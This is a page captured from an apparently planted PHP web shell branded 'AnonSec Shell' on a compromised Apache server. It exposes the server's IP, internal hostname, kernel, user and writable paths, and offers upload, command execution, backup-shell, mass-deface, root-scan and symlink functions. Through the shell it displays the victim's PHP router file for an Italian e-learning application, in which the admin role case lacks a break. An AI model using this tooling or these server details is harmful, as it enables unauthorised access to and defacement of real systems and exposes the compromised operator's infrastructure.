. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 52.223.31.75  /  Your IP : 172.31.6.220   [ Reverse IP ]
Web Server : Apache/2.4.66 () OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux ip-172-31-14-81.eu-central-1.compute.internal 4.14.281-212.502.amzn2.x86_64 #1 SMP Thu May 26 09:52:17 UTC 2022 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
Domains : 4 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/sapere/app/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/sapere/app/router.php
<?php 

$api = new API();
/*ROUTER*/

/*METODI PUBBLICI CHE NON RICHIEDO IL LOGIN*/
if(METHOD!="login" && METHOD!="recuperapassword" && METHOD!="clientconnesso" && METHOD!="clientdisconnesso" && METHOD!="clientmessage" && METHOD!="verificacertificato" && METHOD!="verificaattestato" && METHOD!="verificareport"){

	if(!$api->validateAuthAndGetUser()){
		API::responseMessageStatic("Method non autorizzato!", false);
		die;
	}
}

/*METODI PRIVATI CHE  RICHIEDONO IL LOGIN*/
switch(METHOD){
	case "login":
		$login = $api->login(USERNAME, PASSWORD);
	break;

	case "verificacertificato":
		$verificacertificato = $api->verificaCertificato(CERTIFICATO);
	break;

	case "verificaattestato":
		$verificaattestato = $api->verificaAttestato(ATTESTATO);
	break;

	case "verificareport":
		$verificareport = $api->verificaReport(CODICE);
	break;

	
	case "modificapassword":
		$modificapassword = $api->modificaPassword(OLDPWD, NEWPWD);
		break;
	
	case "recuperapassword":
		$recuperapassword = $api->recuperaPassword(USERNAME);
	break;
	
	case "logout":
			$api->logout();
	break;

	case "getregioni":
		$getregioni = $api->getRegioni();
	break;
	case "getprovince":
		$getprovince = $api->getProvince();
	break;
	case "getcomuni":
		if(!IDPROVINCIA){
			$getcomuni = $api->getComuni(0);
		}else{
			$getcomuni = $api->getComuni(IDPROVINCIA);
		}
		
	break;
	case "getnazioni":
		$getnazioni = $api->getNazioni();
	break;

	//WS
	case "clientconnesso":
		
		$clientconnesso = $api->clientConnesso(TOKEN, CONNECTIONID);
	break;
	case "clientdisconnesso":
		$clientdisconnesso = $api->clientDisconnesso(CONNECTIONID);
	break;
	case "clientmessage":
		$clientmessage = $api->clientMessage(CONNECTIONID, MESSAGE, TIPO);//ID_USER
	break;

	case "getConnectionId":
		$getConnectionId = $api->getConnectionId();
	break;
	//FINE WS

	default:		
		switch($_SESSION["userdata"]["user_type_id"]){
			case "830830": include "app/components/admin/router.php";
			case "550550": include "app/components/centri/router.php"; break;
			case "1": include "app/components/studenti/router.php"; break;
			case "2": include "app/components/centri/router.php"; break;//include "app/components/affiliati/router.php"; break;
			case "3": include "app/components/formatori/router.php"; break;
			case "4": include "app/components/supervisori/router.php"; break;
			case "5": include "app/components/editors/router.php"; break;
			case "6": include "app/components/tutor/router.php"; break;
		}
		API::responseMessageStatic("Method non trovato!", false);exit(); break;
}


?>

Anon7 - 2022
AnonSec Team